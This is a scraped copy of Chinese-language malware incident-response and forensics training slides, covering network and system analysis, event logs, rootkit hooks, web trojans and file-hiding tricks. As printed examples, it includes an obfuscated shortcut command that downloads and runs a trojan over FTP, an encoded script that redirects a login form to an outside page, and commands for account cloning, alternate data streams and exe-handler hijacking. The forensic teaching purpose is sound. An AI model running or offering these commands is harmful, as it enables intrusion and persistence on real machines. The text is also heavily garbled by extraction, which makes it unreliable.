




版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
惡意程序病毒解析訓練目錄事故現場作業程序
本機網絡分析
系統活動分析
檔案分析
動態程序查找
一般的查找方式
一般的查找工具
靜態木馬檢查
木馬防查殺的目標
進階的躲藏方式
其他資安系統記錄
植入原因推測
問題與流程討論事故現場作業程序異常現象回報
監控通報
發現不允許的特定連線b
發現內部主機在進行掃瞄
數據庫稽核記錄異常
主機或網絡無法正常提供服務使用者感覺第三方回報
資料外泄
網站被置換或植入程序
犯罪調查
較難感覺到
ARP木馬熒幕上出現不正常自動操作網絡變慢,開機久且會跳錯誤訊息緊急應變的事故成因
惡意攻擊
漏洞入侵(網站服務器、AP主機)b資料非經授權竊取資(料庫服務器、AD主機)
DoS或DDoS
后門
、木馬或病毒
人為點擊電(子郵件、網頁瀏覽、偽裝盜版程序破/解
軟件社交攻擊)自動散布(網芳擴張)
資料遭竄改或刪除
盜竊或勒贖(Ransomware
、Sniffer)
其他單位通知跳板(Command-and-Control)事故影響等級不重要的系統中斷重要系統受影響且造成服務質量降低重要系統無法運作影響范圍大或短期間發生頻繁的事故
C&C或犯罪調查事故存證:未來具法庭需求,或計算機犯罪等與惡意程序
無關時(例如查密帳)
依證據標準備份事故環境
決定系統重新上線時間
使用備份環境的備份調查事故發生細節
媒體控制
法庭程序決定采取步驟依事故成因與影響等級判斷事故回復:先回復運作為主
決定是否備份事故環境b將系統回復至前次正常狀態,完全破壞事證事故排除:無法直接還原,須在線排除決定是否備份事故環境
調查事故發生細節消滅事故成因,確認系統正常運作,可能破壞事證從哪里下手?
使用者以及管理者第一手觀察資料
系統
系統活動記錄
系統環境
系統檔案,包含入侵殘留物程(序檔,
案)資安系統記錄與備份媒體網絡/通訊
網絡封包側錄記錄
其他資安系統記錄是是否進行事件分析作業流程概觀填寫環境狀態歷程表分析目標物件的類別檔
案
分析記錄分析網路活動分析設定分析環境備份開始處理采證或復原系
統
活
動
分
析事故通報否時間目標物件位置關系人處理員描述注意*:記得要先對時注意***:各種資料來源的時區與時間格式都不同作業流程概觀環境狀態歷程表數位證據
利用特定技術,將事發現場所搜集的各種資料加以分析并找出可以被法庭律()采納的證據。
CSIRT專門負責調查和處理數位證據,
其主要工作包括:
搜集證據
(Collect)b檢驗和分析證據
(Identify
and
Analyze)
保存證據
(Preserve)國際上鑒識流程范例犯罪證據搜證步驟數位鑒識調查參考資料
計劃名稱數:位鑒識標準作業程序之實務及方法
研究賴-溪松教授
參考資料來源
.tw/bitstream/987654321/
3486/1/%E6%95%B8%E4%BD%8D%E9%9
1%91%E8%AD%98%E6%A8%99%E6%BA%96%E4%BD%9C%E6%A5%AD%E7%A8%8B%E5%BA%8F%E4%B9%8B%E5%AF%A6%E5%8B%99%E5%8F%8A%E6%96%
B9%E6%B3%95%E7%A0%94%E7%A9%B
6+%E6%9C%9F%E6%9C%AB%E5%A0%B
1%E5%91%8A.ppt網絡活動分析分析目標物件的類別!網絡分享列表↓網絡活動分析更新環境狀態歷程表交付二線分析人員原始封包記錄緊急中斷程序/埠號列表流程新目標物件封包側錄(不建議于本機安裝)WireShark(tcpdump)
SNORT(IDS)
KISMET(無線)封包分析相關網絡設備記錄
封包側錄儀(最好由旁路側錄)
防火墻(L較7佳,能夠記錄Application)
IPS
WAF適用于事件還在發生中,對于舊有事故通常沒
有存下完整記錄,難以追查運氣好可透過封包分析完整記錄到攻擊、感染、
遠遙過程,以及得知攻擊者身份●
Network
Discover
類似安全稽核,不建議由網絡發起主動探尋封包分析(Sniffer)
NetWitness
NIKSUN
NetDetector
Sandstorm
NetIntercept
流量分析b
ntop
MRTG/PRTG、Cacti
IDS/IPSb
Flow
based
monitor
DatabaseAuditing商用網絡鑒識工具HTTPAttack
SSLAttackFTPfrom
Intranet
SMTPfrom
Intranet
SQLQueryNon-httptrafficon
80/443
portSniffer分析目標本機網絡活動觀察
ipconfig
本機連線狀態
b
netstat
-nba
Tcpview/TCPLogView
Currports
b
fport網絡芳鄰活動b
netshare
←
→
netsession
←
→openfiles
net
use內建指令net家族
net
localgroup
netgroup(網域控制站)net
share
net
startnet
session
net
usenetviewnet
user后門連線分析練習
程序占用埠號當前連線狀態網絡分享緊急中斷網絡分享
原始封包側錄參考資料
Computer
Forensics:
InvestigatingNetwork
Intrusionsand
CyberCrime25練習
Snapshop當前干凈的VM
檢查以下程序的網絡狀態
b
setop.exe
a
ppmgmt.exe
biapple.exe
檢查目的程序占用埠號當前連線狀態
網絡分享setop.exe
檔案:
C:\WINNT\svchost.exe機碼值:
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\System網絡活動:b試圖連到1:52(
140.136.25.2:52)
Whois信息:輔仁大學appmgmt.exe網絡活動:b
DNS查詢
連往00:80b
whois信息:美國(原本位于湖北省)biapple.exe
檔案:
C:\WINNT\svchost.exeb
C:\WINNT\system32\msextapi.dllb
C:\WINNT\system32\msrascfg.ini機碼值
:
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\GameServer
Browser
Help
Objects網絡活動:b
DNS查詢rabbi.bi-apple.netInternet反向式木馬案例潛伏期www.hacker.net
跳板機2
跳板機3使用者
AD
Serverwww.hacker.netHacker
ServerDNSServer跳板機1大陸黑客IntranetFirewallDNSRouterDMZInternet活動期一www.hacker.net使用者
AD
Server反向式木馬案例(續)www.hacker.net
跳板機2Hacker
DNSServerwww.hacker.netDNSServer跳板機3跳板機1大陸黑客IntranetFirewallRouterDMZRemote
ControlIntranet反向式木馬案例(續)www.hacker.net跳板機3活動期二使用者
AD
Server反向連接:80跳板機2Hacker
DNS
Server攻擊內
部機器DNSServerInternet
Remote
Control跳板機1大陸黑客FirewallRouterDMZ系統活動分析交付二線分析人員使用者與群組
列表系統環境分析目標物件的類別系統信息收集更新環境狀態歷程表緊急變更設定分析開機時程序與
排定的工作
機碼值
新目標物件dir/a/s/bregedit/regedt32.exereg/regdmp.exesc.exequery
bufsize=
10000
netshdiag
showall/v
(old)netsh
dumproute
printgpresultset基本記錄工具
cmd內建指令net家族
net
localgroup
netgroup(網域控制站)net
share
net
startnet
session
net
usenetviewnet
user使用者躲藏
常見的使用者躲藏方式
無法列表的使用者
修改現有使用者權限相關工具
net
user
PsGetSid
user2sid
sid2user
aio
Cca
HideAdmin隱藏的使用者
無法列表的使用者b
在AD環境下,hostname$則是各主機的計算機注冊賬號,登入時執行身份為NETWORK
SERVICE
結尾帶有
本機使用者名稱
,也會讓Window認s為它是計算機賬號b使用
net
user看不到
修改現有使用者權限克(隆賬號)b讓新賬號與內建賬號(administrator,guest的)
SID相同aio.exe
aio-cloneadministratorguest
123456
用guest/
123456登入,成為administratoraio.exe難以察覺克隆賬號查找法
aio–checkclonecca\\主機
administator
密碼
GuestDeleteGues刪t除大師克隆賬號查找法
–回避查找建一個管理者賬號clone該賬號
刪除該賬號SAM里的FV(不要用netdelete)克隆賬號查找法
2
Reged32.ex改e權限\\HKEY
LOCAL
MACHINE\SAM\SAM克隆賬號查找法
2(續)
Regedit\\HKEY
LOCAL
MACHINE\SAM\SAM\Domains\Account\Users看誰的F值跟administrators一樣克隆賬號查找
–風險
有經驗的黑客會取消
administrators對這些機碼的讀寫權限\\HKEY
LOCAL
MACHINE\SAM\SAM\\HKEY
LOCAL
MACHINE\SAM\SAM\Domains\Account\Users
無法讀寫或修改權限時,可以確認主機已經遭到攻擊練習回復到干凈VM
收集使用者狀態
檢查以下程序的使用者狀態
useradd.bat
檢查目的
比對使用者狀態Event
Log
Evt(WindowsXP/2003)
、Evtx(Windows
7/2008
Application
Security
System建議事先開啟檔案稽核
修改安全性原則Event
Log常見搜查目標
調整時間值(SecurityEvent
ID520)
超過1天
讀寫
C$,D$,
E$的..事件
(Security
Event
ID
5140)
程序執行失敗,例如安裝核心驅動程序失
敗(System
Event
ID7045)
登入遠端RDP失敗(SystemEvent
ID
10006)
指定的目錄被寫入檔案●Event
ID5140b列出所有讀寫
C$,
D$,
E$的..事件,串查登
入主機當時的所有登入者遠端讀寫檔案登入桌面
列出遠端登入桌面的來源和使用賬號
Application
event
ID
:4001登入事件,但正常事件可能很多,難以區分相關事件
Application
event
ID
:9003DWM(DesktopWindow
Manager啟)動失敗,代表有登入桌面
Application
event
ID
:9009
DWM結束
Systemevent
ID:7001客戶經驗改進通知,代表有登入桌面練習回復到干凈VM匯入Event
Log
檢查遠端存取事件環境信息搜集
常用搜集小工具
HijackThis顯-示常被惡意植入的目標設定
b
autoruns–顯示會隨開機自動啟動的程序
b
msconfig–顯示開機設定檔案分析--動動態程序查找開啟服務執行中程式清單緊急停止交付二線分析人員分析目標物件的類別動態程序查找!執行中DLL清單↓系統活動分析更新環境狀態歷程表新目標物件!一銀ATM盜領案一般查找的可疑目標
檔案與服務的名稱
檔案與服務的版本與描述
檔案時間
網絡埠執行中程式與狀態列表執行中DLL與狀態列表已開啟服務狀態列表一般查找方式
常用自動工具
SysInternals
(Microsoft)-Process
Explorer-Process
Monitor-Pstools
Suite
NirSoftTools
IceSword
Wsyscheck
HookExplorer、ArchonAntiAPIHook、Ring3
APIHookScanner
tasklist/M、listdlls–檢視dll載入狀態
WhatsHappening–顯示執行中的行程Process
Explorer
檢視當前行程狀態Process
Monitor結合兩種監控工具
Filemon–檢視檔案讀寫狀態
RegMon–檢視登錄值讀寫狀態SysInternals
常用
PSTools
Suite
Autoruns
ProcessExplorer
Process
Monitor
(FileMon+RegMon)
TCPViewPsExec–
遠端執行程序PsFile–顯示被遠端開啟的檔案PsGetSid–顯示主機或使用者的SIDPsKill–移除程序行程
PsInfo–檢視系統信息
PsList–檢視程序行程PsLoggedOn–檢視本機與遠端登入者
PsLogList–傾印事件檢視器記錄PsPasswd–修改賬號密碼PsService–檢視與控制服務PsShutdown–關閉主機
PsSuspend–暫停行程Pstools
工具包API
Hook
一般程序會呼叫系統API進行工作。Hook
就是在呼叫系統AP前I,先讓程式呼叫到
惡意函數,執行完后再跳回系統API繼續
動作。
最基本的HookUser32.dll:HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\Appinit
DllsSSDT
SystemServices
DescriptorTable
Ring0區,儲存各函數的位址可用以攔截Window的s操作。防毒程序經常利用攔截
病毒,惡意程序經常利用躲避調查。●SSDT
Hook
原本使用ntoskrnl.exe執行的操作,被第三方程序介
入,亦即把位址改成自己,處理完再丟回給ntoskrnl.exe
INLINE
SSDT
HOOK
不是改對應位置,是改函數本身,先跳轉自己,處理
完再丟回
Rootki例t:NtDeleteFile
Hook–
防殺FSD
檔案系統驅動程序(FileSystem
Driver)例:FileSystem
Filter
Driver:防毒、加解密
、
檔案讀寫監控
FSD
Inline
Hook
讀寫檔案時先經過惡意
程序處理WsyscheckWsyscheckWsyscheckWsyscheck
檢查IE會帶起的選項HookExplorer練習回復到干凈VM重新檢查下列程序的系統
狀態
b
setop.exe
biapple.exe
檢查目的
找出新增檔案
找出新增服務
比對機碼值
比對其他系統狀態的變更setop.exe
檔案:
C:\WINNT\svchost.exe機碼值:
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\System網絡活動:b試圖連到1:52(
140.136.25.2:52)
Whois信息:輔仁大學biapple.exe
檔案:
C:\WINNT\svchost.exeb
C:\WINNT\system32\msextapi.dllb
C:\WINNT\system32\msrascfg.ini機碼值
:
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\GameServer
Browser
Help
Objects網絡活動:b
DNS查詢rabbi.bi-apple.net程序分析
-Winalysis程序分析
-Winalysis程序分析
-Winalysis練習回復到干凈VM重新檢查下列程序的系統
狀態
b
fswall.exe
FILE
101.exe
檢查目的
找出新增檔案
b
找出新增服務
比對機碼值
比對其他系統狀態的變更
練習移除程序fswall.exe
檔案:b
C:\WINNT\system32\dump48.exe(偽裝微軟)
C:\WINNT\system32\kazaabackupfile\*.*機碼值
:
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\Dump
System
Debug
and
Control透過Kazaa散布惡意程序FILE_101.exe檔案:bC:\WINNT\system32\ntdvrlib.dll
C:\WINNT\system32\SCSrv.dllbC:\Documentsand
Settings\Administrator\Local
Settings\Temp\Del*.tmp
服務:
Script
Client
Service(WorkStation服務依存)網絡活動
DNS查詢view1.j2ee.us、view2.j2ee.us
連到1863/TCP程序分析
-AntiVirus
例
:VirusTotal程序分析
–OnlineSandbox
Service80/automated-malware-analysis/程序分析
–OnlineSandbox
Service81練習回復到干凈VM重新檢查下列程序的執行結果態
b
iisdoor.exe
msnchecker.exe
rescue_system-common-en.exe
b
Checkand
Getv1.14.zip
CheckAnd
Getv1.8.70.zip檔案分析--靜態檔案檢查檔案備分交付二線分析人員緊急移除相關檔案搜尋可疑檔案搜尋↓檔案分析
新目標物件分析目標物件的類別靜態檔案檢查更新環境狀態歷程表記錄檔案屬性靜態尋找尋找可疑檔案
在不執行惡意程序的情況下進行分析對非二進制格式檔案可直接檢視
對二進制格式檔案進行先期處理
分析工具利用光盤執行分析工具以非安裝檔為主PE格式
PE(Portable
Executable)可移植式執行檔:可在所有
Microsoft32位元作業系統中執行的檔案,相同的
PE格式檔案可在任何版本的
Windows95、98、Me、NT與
2000
上執行
。
標頭為4D5A(MZ)。
常用附檔名:exe、dll,但可使用.gif等其
他檔名偽裝。檔案搜尋與分析–二進制格式檔案檢視是否為PE格式檔案檔案屬性、大小、版本等檢視檔案的可讀字符
tree-檔案列表BinaryTextScan可-讀字符內容fciv.exe
、md5sum-檔案檢查碼ff.exe-檔案尋找與比對xcopy.exe-檔案備分
Rootkit搜尋
AntiVirus、AntiTrojan(不建議在原始證據或在線系統執行)ForensicToolkit20
AFind–找出檔案上次存取時間,不會修改屬性
Audited–找出受稽核的檔案
DACLchk.exe–找出所有可供全部使用者存取的檔案。FileStat–
快速列出檔案屬性HFind–找出所有隱藏檔及其上次存取時間Hunt–
快速列出現有分享資源SFind–找出所有隱藏資料流及其上次存取時間加殼與剝殼
PE檔案的加殼/剝殼機制–Aspack–ASProtect–
Petite–
PECompact–
Neolite–
Shrinker
–
Upx…
萬用撥殼機Ollydbg、ProcDump32、PeiDPeidMalewareAnalyzer
http://malwareanalyser.blogspot.com/練習回復到干凈VM列出
Virus目錄下的加殼程序網頁木馬的植入點(非二進制檔)檔案植入(html,
jsp,asp,asa,
php,vbs)b網頁后門新檔、腳本程序碼:
html、jsp
、
asp、php、vbs…
等可疑的文件或批次檔:txt、cfg、ini、bat
…
等變更舊有程序上傳目錄ISAP置I換:%systemroot%\system32\inetsrv\/test.asp或//test.aspx或//test.asa/目錄下所
有檔案都視為可執行
數據庫植入
留言版
交互式功能網頁木馬查找
工具檢查
與原本檔案清單比對
bff.exe依時間查找
網絡安全衛士(效用較差,但方便列出副檔名)雷客圖ASP站長安全助手
思易ASP木馬追捕
、淘特
手工核對
asacer
cdx
stm
shtml檔案
ISAP中I
網頁目錄下屬性為H的檔案或目錄
不一定能在在線檢查
不保證能全部找到自己撰寫findshell網絡安全衛士雷客圖
指令b
cscript
[安裝目錄\Scan.vbs]
目[標目錄]報[表
目錄\Report.html]b例:cscriptScan.vbsc:\InetPubC:\Report.html雷客圖手工核對(1)
常用的Javascript內嵌碼
Iframe
src=“http
<bodyonloadbwidth小于10,或height小于10b
中"間有帶或(或)@“可疑但容易誤判的b
document系列,例如document.write
b新視窗系列,
window.openb
"http,特別是src=""及,onLoad=""手工核對(1)-兩種躲藏的范例
<ahref=".tw@1208929129">ADMIN
LOGIN</A>
<script>www
=
newobj1();functionobj1(){this.google=newobj2;}functionobj2(){=obj3;}functionobj3(){open("http://.tw@1208929129","NewWindow","toolb
ar=no,location=no,directories=no,status=no,menubar=no,scrollbar
s=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,
top=10");}</script><span
id="1"onclick="www.google.com();">TEXT<span>eval(escape(unescape(encodeURI(encodeURIComponent(jscript.encodejavascript.encodevbscript.encodeexpression(手工核對(2)-Script木馬
回避明碼檢查手工核對(2)-編碼后的范例
%3c%3d%2522%253e%253cscript%3eeval(unescape(%2522%2
52564%25256F%252563%252575%25256D%252565%25256E%252574%25252E%252567%252565%252574%252545%25256C%252565%25256D%252565%25256E%252574%252573%252542%252579%25254E%252561%25256D%252565%252528%252522%25256C%25256F%252567%252569%25256E%25255F%252566%25256F%252572%25256D%252522%252529%25255B%252530%25255D%25252E%252561%252563%252574%252569%25256F%25256E%25253D%252522%252568%252574%252574%252570%25253A%25252F%25252F%252577%252577%252577%25252E%25257A%252575%252573%25256F%25252E%25256F%252572%252567%25252E%252574%252577%25252F%252564%252565%25256D%25256F%25252E%252570%252568%252570%252522%2522))%253c/script%253e%253cscript手工核對(2)解-碼wscriptsystem(,
shell
exec(
,
exec(
,
passthru(fopen,
popen,fread,fclose,fwrite,file
exists,
mkdir,
rmdir,
chmod,
unlink,closedir,
is
dir,
readdir.opendir,fileperms,
delfile「`
」php支援UNIX的跳脫執行符號b例:echo`ls`;b即shell
exec()手工核對(3)–
網頁后門手工核對(4)–
SWF/RM掛馬swf掛馬針對已知/未知
flash
player漏洞
rm掛馬針對已知/未知
rm
player漏洞
比較實際的偵測方式
(1)
比對自有swf/rm檔案與原始檔是否被修改b
(2)
網頁中轉導或引用(src=http)到他站swf/rm檔的內容
各種CLSID手工核對(5)–
urlsnooper
在沒有Lo的g情況下監控頁面中的網址手工核對(6)–轉址掛馬目錄名稱帶有副檔名b*.asa目錄(直至2009年中才被公布)
b
jpg,
gif:-
.tw/show.jpg=>-
.tw/show.jpg/=>-
.tw/show.jpg/index.htm
404,500
Error轉導向目標手工核對(7)–
Bookmark掛馬
偽裝的Bookmark可被用于
:
釣魚網站廣告頁面
XSS攻擊
DDoS攻擊手工核對(7)–
Bookmark掛馬修-改
url檔的篡改
url檔的篡改-基本設定
URL:目標網址
WorkingDirectory:工作目錄bIconFile:圖示的取用來源,可以是ICO,
DLL或
EXE
IconIndex:圖示檔中第幾個
Modified:修改日期
ShowCommand:啟動后的視窗大小,3最小,7最
大
HotKey:設定直接連向此網址的快速鍵手工核對(7)–
Bookmark掛馬修-改手工核對(7)–
Bookmark掛馬修-改
url檔的篡改-基本設定HotKey手工核對(7)–
Bookmark掛馬修-改
url檔的篡改-基本設定HotKey手工核對(7)–
Bookmark掛馬查-找
先檢查HKEY
CURRENT
USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserShell
Folder的s
Favorites位置手工核對(7)–
Bookmark掛馬查-找type*.url比對手工核對(7)–同類概念延伸啟始網頁:但常容易被發現
Proxy:不容易發現,但使用者會感覺變
慢/etc/hosts檔
:不容易發現附加DNS后綴:超不容易發現手工核對(7)–附加DNS后綴附加DNS后綴手工核對(7)–附加DNS后綴手工核對(8)–ARP
掛馬.Wireshark手工核對(9)–
IIS篩選器和MIMEdir*.aspx*.aspx/s
/b
>
filelist.txtfindstr/i/r/s/g:%cd%\shell.sig
/f:%cd%\filelist.txt
>%cd%\find
shell
result
.txtfindshell練習
檢查web目錄下哪些檔案可疑?
檢查ARP掛馬封包惡意程序防查殺基本的檔案躲藏方式
檔名偽裝,例如exp1orer.exe目錄偽裝,例如%SystemRoot%\system32\explorer.exe
屬性+S+
藏執行時刪除自身
系統還原
取代現有檔案,例如dll掛馬練習回復到干凈VM重新檢查下列程序的系統
狀態
SoftHome.exe
SoftHome2.exe
檢查目的
找出新增檔案
找出新增服務
比對機碼值
比對其他系統狀態的變更SoftHome.exe
檔案:
C:\Program
Files\Internet
Explorer\svhost32.exeb
C:\WINDOWS\system32\mxdll.dll機碼值:
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\mxSoftHome2.exe
檔案:
C:\Program
Files\svhost32.exe
C:\WINDOWS\system32\xwdll.dll機碼值
HKLM\Software\Microsoft\Windows\Current
Version\Run\xw進階的躲藏方式
LNK捷徑檔驅動程序
SystemVolume
Information
.結尾目錄
-結尾檔案
副檔名開啟
不可見字符副檔名
SupperHidden
ADS串流反向檔名
com1保留字資源回收筒
IFEO劫持
debug執行
PATH路徑此例中,這串指令執行了連接一個服務器
下載惡意程序(木馬程序)
執行它!%ComSpec%/cseth=p-&set
j=ge&sets=.g03z.&echoechoowww%s%com^>t>b.bat&callb.bat&echoaa33>>t&echobb33>>t&echoecho
%j%tp
p.vbs^>^>t>>c&echoecho
bye^>^>t>>c&echoft%h%s:t>>c&echostart
p.vbs>>c&renc
h.bat&call
h.bat&捷徑是一串DOS指令的集合LNK捷徑檔o
setdevmgr
show
nonpresent
devices=1
裝置管理員(devmgmt.msc)->顯示隱藏裝
置驅動程序查找SystemVolume
Information隱藏的系統資料夾,是「系統還原」工具
用來儲存其信息與還原點的地方,每一個
磁碟分割上都有一個預設賬號通常沒有權限瀏覽
檢查方式
:
b
mt.exe–sub
dir"C:\SystemVolume
Information“
正常來說應該是空的,有東西就是有問題
使用mt.exe調查前應先關閉防毒程序
若系統上本來就有mt.exe,有問題.結尾目錄dir后目錄結尾為「.」b
mdtest..或\mkdirtest..\
copy
hello.txt
"G:\ERS\test..\\hello.txt"
b無法直接刪除
無法使用搜尋找到
檢查法
startG:\ERS\test..\
b
rmdir
"test..\"-結尾檔案
檔名后結尾為「_」,為windows壓縮檔
如果是已知病毒,病毒的自動防護會忽略,
要全系統掃毒時才有可能找到b
compress-Rfilename
檢查法
檔名尾巴但(檔名可變更)
SZDD格式b
expand–rfilename副檔名開啟機碼值中設定exefile="%1"%*
檢查b
assoc
|find
"exe"
ftype
|find
"exefile"b檢查所有副檔名開啟方式
反向利用抓自動啟動的后門
ftypeexefile="C:\recordexe.bat"
%1
b
ftypeexefile="%1"
%*其他副檔名
HKEY
LOCAL
MACHINE\Software\CLASSES\exefile\shell\open\command
\piffile\shell\open\command
\htafile\shell\open\command
\comfile\shell\open\command
\cmdfile\shell\open\command
\batfile\shell\open\command不可見字符副檔名
概念類似UNIX空格符目錄
ALT-小鍵盤,例如ALT-128中文全形「
」不可見字符可能可用d
r
出
中文全形較難以以dir查出不可見字符副檔名
–
比一比不可見字符副檔名中文全形「
」
MS-DOS模式不一定查出來SuperHidden
SuperHidden就是System+Hidden
修改機碼值強制不顯示系統屬性與隱藏屬
性檔案(需重開機)b
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Explorer\Advanced\Folder\Hidde
n\SHOWAL的L
CheckedValue被設為0,或型態不是REG
DWORD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidde的n
CheckedValue被設為1SuperHidden
SuperHidden就是System+Hidden
修改機碼值強制不顯示系統屬性與隱藏屬
性檔案(需重開機)b
HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Explorer\Advanced\Folder\Hidde
n\SHOWAL的L
CheckedValue被設為0,或型態不是REG
DWORD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidde的n
CheckedValue被設為1SuperHiddenADS串流
ADS(Alternate
DataStream):NTFS系統下可
以隱藏檔案,且顯示大小不變,常被惡意利用。
寫入-
typetest2.exe>test1.txt:test2.exe
執行-
start
D:\test1.txt:test2.exe刪除-
typetest1.txt>test1-clean.txt-或把檔案copy到非NTFS系統
搜尋-
ADSSpy、Afind.exe
Kaspersky用這種方式作檔案檢查,所以搜尋時
會造成誤判。反向檔名反向檔名
Unicode字符檔名
LEFT-TO-RIGHT
OVERRIDE(U+202D)
RIGHT-TO-LEFT
OVERRIDE
(U+202E)b例:putty(RLO字符)gpj.exe反向檔名制作反向檔名防護反向檔名防護反向檔名防護com1保留字
Windows保留給設備用的保留字符串con,
nul,
prn,
lpt1,lpt2,aux,com1,
com2,com3,
com4...b
目錄-
md
C:\com1
失敗-
md
C:\com1\
成功-copy
text.exe
C:\com1\-目錄無法刪除
,
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 鄰里火災糾紛協議書
- 非自愿簽婚內協議書
- 裝修安全保證協議書
- 銷售車輛合同協議書
- 首付付款比例協議書
- 餐廚垃圾合同協議書
- 苗圃現金收購協議書
- 轉讓藥廠設備協議書
- 加入俱樂部合同協議書
- 協會副會長合同協議書
- 2024年江蘇連云港中考滿分作文《天吶原來這么有意思》12
- 2024年秋兒童發展問題的咨詢與輔導終考期末大作業案例分析1-5答案
- 通信工程建設標準強制性條文匯編(2023版)-定額質監中心
- 機械制造專業畢業設計(論文)-BCL-609型壓縮機結構設計
- 2022屆高考英語考前指導課件(25張ppt)
- DB44∕T 2158-2019 公共場所(水下)用電設施建設及運行安全規程
- 液氨培訓課件資料
- 專家聘用協議書參考
- 板式家具生產工藝PPT通用通用課件
- 肌腱縫合術(課堂PPT)
- 產品線業務計劃書
評論
0/150
提交評論